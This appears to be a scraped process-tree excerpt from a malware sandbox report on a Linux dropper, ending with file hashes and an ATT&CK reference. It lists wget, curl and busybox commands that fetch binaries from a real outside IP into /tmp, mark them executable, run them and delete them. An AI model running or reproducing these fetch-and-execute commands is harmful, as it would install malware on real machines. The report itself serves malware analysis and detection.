/bin/rmrm K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵PID:1652
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵PID:1653
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- Writes file to tmp directory
PID:1654
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵PID:1655
-
-
/bin/chmodchmod 777 WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- File and Directory Permissions Modification
PID:1656
-
-
/tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo./WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- Executes dropped EXE
PID:1657
-
-
/bin/rmrm WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵PID:1658
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵PID:1659
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- Writes file to tmp directory
PID:1660
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵PID:1661
-
-
/bin/chmodchmod 777 DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- File and Directory Permissions Modification
PID:1662
-
-
/tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R./DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- Executes dropped EXE
PID:1663
-
-
/bin/rmrm DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵PID:1664
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵PID:1665
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- Writes file to tmp directory
PID:1666
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵PID:1667
-
-
/bin/chmodchmod 777 eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- File and Directory Permissions Modification
PID:1668
-
-
/tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5./eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵
- Executes dropped EXE
PID:1669
-
-
/bin/rmrm eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵PID:1670
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵PID:1671
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- Writes file to tmp directory
PID:1672
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵PID:1673
-
-
/bin/chmodchmod 777 RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- File and Directory Permissions Modification
PID:1676
-
-
/tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M./RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵
- Executes dropped EXE
PID:1677
-
-
/bin/rmrm RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M2⤵PID:1678
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵PID:1679
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- Writes file to tmp directory
PID:1680
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵PID:1681
-
-
/bin/chmodchmod 777 WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- File and Directory Permissions Modification
PID:1682
-
-
/tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm./WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵
- Executes dropped EXE
PID:1683
-
-
/bin/rmrm WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm2⤵PID:1684
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵PID:1685
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- Writes file to tmp directory
PID:1686
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵PID:1687
-
-
/bin/chmodchmod 777 KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- File and Directory Permissions Modification
PID:1688
-
-
/tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an./KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵
- Executes dropped EXE
PID:1689
-
-
/bin/rmrm KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an2⤵PID:1690
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97